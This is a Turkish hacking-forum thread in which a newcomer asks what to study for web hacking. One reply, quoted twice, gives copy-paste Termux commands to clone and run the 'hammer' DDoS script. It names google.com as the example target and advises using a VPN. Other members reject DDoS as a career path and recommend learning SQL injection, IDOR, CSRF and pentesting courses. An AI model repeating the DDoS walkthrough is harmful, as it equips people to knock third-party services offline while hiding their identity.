Merhabalar!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

vladerr

Yeni üye
22 Ağu 2023
10
5
Merhabalar, ben Vlader. Foruma bilgi edinmek ve kendimi hacking alanında geliştirmek için katıldım. Bir de, web hack için neler öğrenmemi önerirsiniz? (No-Redirect ve SQL Injection'a az buçuk hakimim)

_._

Üye
22 Ağu 2023
159
2
66
DDOS ATTACK öğrenmeni tavsiye ederim.

Yasadışı bir faliyet olmaması için de kendi siteni çökertebilirsin

öncelikle DDoS ATTACK nedir?
DDoS (Distributed Denial of Service) saldırısı, bir hedef internet sitesine veya servise büyük miktarda trafik gönderilerek, kaynakların tükenmesi sonucu hizmetin kullanılamaz hale gelmesine neden olan bir siber saldırı türüdür. Saldırganlar genellikle birçok farklı kaynaktan gelen trafiği koordine ederek hedefe yöneltirler, bu da hedefin sunucularının veya sistemlerinin aşırı yük altında çökmesine yol açabilir. DDoS saldırıları genellikle hizmet kesintisi, yavaşlama veya kullanılabilirlik sorunlarına neden olabilir.

Şimdide sana Termux üzerinden nasıl yapılacağını anlatıcam

KODLAR

pkg install git

pkg install python

git clone GitHub - cyweb/hammer: Hammer DDos Script - Python 3

ls

cd hammer

ls

chmod +x *

BU BÖLÜMÜ KOPYALA YAPIŞTIR YAPABİLİRSİN üstteki bölümü

python hammer.py -s
Yazdıktan sonra google.com
ÖRNEK SITE

Yani şu şekilde görünücek
python hammer.py -s google.com
ÖRNEK SITE

Saldırıyı sonlandırmak için

CTRL + C
DDoS saldırılarının süresi birkaç dakikadan birkaç gün veya daha fazla süreye kadar değişebilir. Süre, saldırganın hedefe karşı ne kadar kaynak ve trafik kullanabileceğine, hedefin savunma mekanizmalarına ve saldırının karmaşıklığına bağlı olarak değişebilir. Ancak genellikle DDoS saldırıları kısa süreli olabilir ve hızlı bir şekilde engellenebilir.

Umarım yardımcı olmuşumdur :)

Vpn kullanmanı şiddetle tavsiye ederim

Son düzenleme:

Novn

Üye
12 Haz 2022
79
1
30
Merhabalar, ben Vlader. Foruma bilgi edinmek ve kendimi hacking alanında geliştirmek için katıldım. Bir de, web hack için neler öğrenmemi önerirsiniz? (No-Redirect ve SQL Injection'a az buçuk hakimim)
Merhabalar aramıza hoşgeldin, web hack alanında öğrenebileceğin çok fazla konu var benim önerim sql injection olayını iyice çözümlemen manuel olarak bunu yapabilecek seviyeye gelince idor, csrf gibi zafiyetlerden devam edebilirsin kaynak olarak youtube üzerinde (mdisec web security) yazarsan çıkacaktır 35 videoluk oynatma listesi mevcut bahsettiğim konulara oradan devam edebilirsin başarılar dilerim

DDOS ATTACK öğrenmeni tavsiye ederim.

Yasadışı bir faliyet olmaması için de kendi siteni çökertebilirsin

öncelikle DDoS ATTACK nedir?
DDoS (Distributed Denial of Service) saldırısı, bir hedef internet sitesine veya servise büyük miktarda trafik gönderilerek, kaynakların tükenmesi sonucu hizmetin kullanılamaz hale gelmesine neden olan bir siber saldırı türüdür. Saldırganlar genellikle birçok farklı kaynaktan gelen trafiği koordine ederek hedefe yöneltirler, bu da hedefin sunucularının veya sistemlerinin aşırı yük altında çökmesine yol açabilir. DDoS saldırıları genellikle hizmet kesintisi, yavaşlama veya kullanılabilirlik sorunlarına neden olabilir.

Şimdide sana Termux üzerinden nasıl yapılacağını anlatıcam

KODLAR

pkg install git

pkg install python

git clone GitHub - cyweb/hammer: Hammer DDos Script - Python 3

ls

cd hammer

ls

chmod +x *

BU BÖLÜMÜ KOPYALA YAPIŞTIR YAPABİLİRSİN üstteki bölümü

python hammer.py -s
Yazdıktan sonra google.com
ÖRNEK SITE

Yani şu şekilde görünücek
python hammer.py -s google.com
ÖRNEK SITE

Saldırıyı sonlandırmak için

CTRL + C
DDoS saldırılarının süresi birkaç dakikadan birkaç gün veya daha fazla süreye kadar değişebilir. Süre, saldırganın hedefe karşı ne kadar kaynak ve trafik kullanabileceğine, hedefin savunma mekanizmalarına ve saldırının karmaşıklığına bağlı olarak değişebilir. Ancak genellikle DDoS saldırıları kısa süreli olabilir ve hızlı bir şekilde engellenebilir.

Umarım yardımcı olmuşumdur :)

Vpn kullanmanı şiddetle tavsiye ederim

Yanlış anlama dostum yanlışını düzeltmek istiyorum.

1- Ddos ile kariyer hayatında herhangi bir yere varamaz.

2- Öyle geçip kaliden veya termux dan ddos atarsan 2 haftaya kalmaz bu modeme noldu diye aklını yemeye başlarsın .d

3- Ddos hacking değildir.

Bu gibi şeylerde sizin gelişiminize katkıda bulunur fakat %0000000,1 ine :) Sana tavsiyem Pentest alanında kendini sıfırdan sağlam bir şekilde geliştirmendir.

Umarım en kısa zamanda hedeflediğin yere ulaşırsın :)

Dostum sadece bu zafiyetler ile kendini sınırlandırmadan genel tüm zafiyetler hakkında bir şeyler öğrenmeni tavsiye ederim.

En çokta güncel zafiyetlere göz atmanı öneririm. Umarım istediğin yere varırsın :)

gostking

Katılımcı Üye
29 Nis 2020
362
13
688
Vatan
Öncelikle hoşgeldin şunu söylemem lazımki kendimi hacking alanında geliştirmek istiyorum demişsin benim sana verebileceğim tavsiye sadece web hacking'le kendini kısıtlama diğer alanlarada yönel tek bir yere odaklanma kendini geliştirmek için udemy vb. Yerlerdende kurslar alabilirsin ne zaman istersende biz burada yardım ederiz başarılar dilerim.

'Ra

Ticaret Kategori Sorumlu Yardımcısı
21 Kas 2015
2,416
49
969
Merhabalar hoşgeldiniz Herşeyden önce forum kullarını okumanı tavsiye ederim

İyi Forumlar

vladerr

Yeni üye
22 Ağu 2023
10
5
Merhabalar aramıza hoşgeldin, web hack alanında öğrenebileceğin çok fazla konu var benim önerim sql injection olayını iyice çözümlemen manuel olarak bunu yapabilecek seviyeye gelince idor, csrf gibi zafiyetlerden devam edebilirsin kaynak olarak youtube üzerinde (mdisec web security) yazarsan çıkacaktır 35 videoluk oynatma listesi mevcut bahsettiğim konulara oradan devam edebilirsin başarılar dilerim
Dostum sadece bu zafiyetler ile kendini sınırlandırmadan genel tüm zafiyetler hakkında bir şeyler öğrenmeni tavsiye ederim.

En çokta güncel zafiyetlere göz atmanı öneririm. Umarım istediğin yere varırsın :)
Öncelikle hoşgeldin şunu söylemem lazımki kendimi hacking alanında geliştirmek istiyorum demişsin benim sana verebileceğim tavsiye sadece web hacking'le kendini kısıtlama diğer alanlarada yönel tek bir yere odaklanma kendini geliştirmek için udemy vb. Yerlerdende kurslar alabilirsin ne zaman istersende biz burada yardım ederiz başarılar dilerim.
Önerileriniz için çok teşekkür ederim, en yakın zamanda uygulayacağım :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.